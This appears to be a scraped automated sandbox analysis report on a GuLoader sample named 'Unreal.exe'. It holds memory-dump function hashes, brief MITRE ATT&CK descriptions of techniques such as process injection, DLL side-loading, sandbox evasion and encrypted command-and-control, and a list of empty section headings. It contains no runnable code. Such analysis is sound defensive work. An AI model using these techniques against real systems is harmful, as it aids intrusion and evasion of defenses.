Opcode ID: ce896407093733d8ac42672e2fb652c7f8fb25cc0040b60d3ff1f78cddb2c5a9
Instruction ID: a7e56578b374ed54d91b8b7fb441531b1ba6e0254f5340fb17e257c81c150790
Opcode Fuzzy Hash: ce896407093733d8ac42672e2fb652c7f8fb25cc0040b60d3ff1f78cddb2c5a9
Instruction Fuzzy Hash: 1072327560434ADFDB389E38C9957EA7BB2FF55340F86421EDC8A9B254D3318A85CB02

Uniqueness

Uniqueness Score: -1.00%

Function 011A9AA7, Relevance: 2.6, Strings: 2, Instructions: 89COMMON

Download Yara Rule

Strings

pg`r, xrefs: 011A9C96
"l, xrefs: 011A9B2C

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: pg`r$"l
API String ID: 0-6584728
Opcode ID: b4149a2abde4ef57ef32d75635e149a17b6f212bcada828c8254e76b86ada554
Instruction ID: 33f7d295732b4b0c1a561f73addd1abb790e34deb29afeb807e499197acedddd
Opcode Fuzzy Hash: b4149a2abde4ef57ef32d75635e149a17b6f212bcada828c8254e76b86ada554
Instruction Fuzzy Hash: 1531037660574C8BEF3C8D3889B47EA2AE2AF96344FD6801BCC4E8B254C73545C68A02

Uniqueness

Uniqueness Score: -1.00%

Function 011A7281, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29923c0bb3c3b68dde1c6660f7ed82b26d7376ddb3449d831e37483a7260a69b
Instruction ID: 58c8342064bb2a49b6ec5703669009c5ee8877ec40ddf2dafe883997b956541b
Opcode Fuzzy Hash: 29923c0bb3c3b68dde1c6660f7ed82b26d7376ddb3449d831e37483a7260a69b
Instruction Fuzzy Hash: 403190341083868BDB39DFB8D984BC67F90AF12364F48829DCC9D8A1DBE3365246C742

Uniqueness

Uniqueness Score: -1.00%

Function 011AD56C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297f13ed8e3cad249e89c5ab7a389217b66f8c5feda094cc532eee4e8a90d69f
Instruction ID: 5dd7febc8480dc6582b938c262d596f81c4546668380a047ce8957ca2003bd33
Opcode Fuzzy Hash: 297f13ed8e3cad249e89c5ab7a389217b66f8c5feda094cc532eee4e8a90d69f
Instruction Fuzzy Hash: 5A1104B9B016488FCB3DDF58C994AE87BA2EF95710FA6401AC94D4B716D370EA40CB12

Uniqueness

Uniqueness Score: -1.00%

Function 011A7996, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f7259f1fc3035f5fe2f0b62125c918a9f6a0cfa6f255a026bc5019fc3cb49ae
Instruction ID: 017209702f45b1637d222799ac23486ff2d041ae65217d7faea8f431ccf9cee8
Opcode Fuzzy Hash: 6f7259f1fc3035f5fe2f0b62125c918a9f6a0cfa6f255a026bc5019fc3cb49ae
Instruction Fuzzy Hash: B911E1356483019FCB6C5E709AA27EF7BE2EF15340F874A1ECCC282199D7344A848A03

Uniqueness

Uniqueness Score: -1.00%

Function 011A99BA, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eeeb1f1757ac91cbe06c395ed6387b5cd174a035fc01037477d4a2a48af968f
Instruction ID: a8b53ea63356e49b166724d2c180bfaeccef10a793276b590ff479382adc0f56
Opcode Fuzzy Hash: 8eeeb1f1757ac91cbe06c395ed6387b5cd174a035fc01037477d4a2a48af968f
Instruction Fuzzy Hash: CFD0808D55435B083B9E347477681970C015FB55FCF5687111C16E7145DF46CDC11153

Uniqueness

Uniqueness Score: -1.00%

Function 011A9749, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.18569185029.00000000011A0000.00000040.00000001.sdmp, Offset: 011A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e08f371d08430c0aa7c24ab263c8d88761a4deab28627cd0436a00fb98a763
Instruction ID: 120efc9e94c0b896860df485d576750613d3e983be090d8f51926390d19d9c17
Opcode Fuzzy Hash: e9e08f371d08430c0aa7c24ab263c8d88761a4deab28627cd0436a00fb98a763
Instruction Fuzzy Hash: 5BB092B6201A809FEF02CE08D482B4073B0FB05A84B0904D0E402CB712C228E904CA00

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Unreal.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage